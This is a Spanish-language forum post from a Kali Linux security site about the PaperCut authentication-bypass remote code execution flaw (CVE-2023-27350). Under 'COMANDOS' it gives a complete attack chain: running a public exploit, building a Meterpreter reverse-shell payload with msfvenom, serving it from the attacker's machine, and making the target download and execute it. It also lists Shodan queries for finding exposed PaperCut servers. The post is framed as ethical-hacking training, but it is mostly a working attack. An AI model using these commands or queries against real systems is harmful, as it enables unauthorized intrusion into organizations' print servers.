Hackers aprovechan vulnerabilidad para acceder a servidores | Seguridad Informática con Kali Linux

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2088
Registered for: 9 years 10 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

Hackers aprovechan vulnerabilidad para acceder a servidores | Seguridad Informática con Kali Linux

#1

Mensaje por admin »

Estas vulnerabilidades (CVE-2023-27350 and CVE-2023-27351.) permiten la ejecución remota de código no autenticado debido
a un authenticaton bypass. Basicamente a groso modo se saltea el logeo de acceso.

El producto realicinado a este nuevo bug son PaperCut MF and NG . Que es PaperCut?

Es un software de gestión de impresión integrado en impresoras, fotocopiadoras para monitorear y controlar la salida de impresión
de una organización con herramientas administrativas simples y fáciles de usar.
Se puede utilizar para realizar un seguimiento de la impresión, proporcionar informes sencillos y establecer reglas y restricciones
para garantizar,en última instancia, que tiene el control total de su impresión.

Hay una serie de escenarios que se pueden configurar en PaperCut:

Supervisión de la actividad en segundo plano
Monitoreo de actividad visible para el seguimiento de gastos para departamentos, proyectos o individuos
Cumplimiento de la asignación
Cargo o Precio por impresión
Reglas de trabajo configuradas para restringir la impresión en color o fomentar la impresión dúplex
Redirección al dispositivo más eficiente para un trabajo en particular.


Imagen

Links o enlaces IMPORTANTES

https://amp-thehackernews-com.cdn.amppr ... t-for.html
https://github.com/adhikara13/CVE-2023-27350
https://github.com/TamingSariMY/CVE-2023-27350-POC
https://www.horizon3.ai/papercut-cve-20 ... ompromise/
https://github.com/horizon3ai/CVE-2023-27350
https://www.huntress.com/blog/critical- ... t-software
Download PC MF NG


COMANDOS

Código: Seleccionar todo

python3 vuln.py


python3 CVE-2023-27350.py --url 'http://192.168.10.36:9191' --command "powershell.exe shutdown /s"

Servidor Web para bajar la carga malicionsa
python3 -m http.server 80

Creamos la Carga Maliciosa

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=192.168.10.87 LPORT=4444

Ahora en listener en msfconsole

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.10.87
set LPORT 4444
show options
exploit

python3 CVE-2023-27350.py --url 'http://192.168.10.36:9191' --command "powershell.exe -c wget -OutFile C:\\Windows\\Tasks\\payload.exe http://192.168.10.87/payload.exe"

python3 CVE-2023-27350.py --url 'http://192.168.10.36:9191' --command "C:\\Windows\\Tasks\\payload.exe"


getuid
sysinfo
ipconfig
shell
Busqueda en SHODAN ZOOMEYE o GOOGLE DORKS

Código: Seleccionar todo

http.html:"papercut"
http.html:"print"
http.html:"papercut" port:9191
http.title:"PaperCut Login"
VIDEO TUTORIAL



Redes de computadoras,Seguridad en redes,Auditoría de seguridad,Protección de la información personal,Seguridad en línea,Protección de la privacidad en línea,Amenazas informáticas,Pentest Lab Setup,Python,Laboratorio de Trabajo,Ciberdelincuencia,Seguridad de la red doméstica,Penetration Tester,Cybersecurity Consultant,learn security,OSINT,oscp certification,try hack me hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,remote function,laboratorio,lab,servidor,como escalar privilegios en WINDOWS,CVE,Printer,Impresoras,hacker exploit,what is a red team,red team exploitation,metasploit,OSI Model Modelo,TCP/IP,Cyberseguridad,VPN,Testing,API Manager,Identity Server,Identity Server Analytics,Identity Server as Key Manager,Enterprise Integrator,Remote Code Execution,RCE,Linux Ubuntu,RCE exploit Critical,Java developers,Acceder a Servidores,Seguridad de la información,Análisis de vulnerabilidades,Seguridad en sistemas web,Explotación de vulnerabilidades,Seguridad en servidores web,Vulnerability,Bypass Detection,proof-of-concept (PoC),authentication bypass,Developing the Exploit,print management software,remote code execution,Ejecucion de codigo remoto,reverse shell connection,HP,Canon,Epson,Kyocera,Vulnerabilidades,Ejecución remota de código,Autenticación bypass,Hacking ético,Protección de datos,Ciberseguridad,Prevención de ataques,Protección de servidores,Seguridad en redes,Brechas de seguridad,Seguridad en sistemas,pentesting,pentester,Ciberataques,Seguridad en servidores,Brechas de datos,Explotación de vulnerabilidades,Protección de la información,Hacking de servidores,Análisis de vulnerabilidades,Pruebas de penetración,Código no autenticado,Acceso no autorizado,Protección contra hackers,Prevención de intrusos,Gestión de riesgos,Gestión de parches,Protección de servidores web

 
 
 

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 4 invitados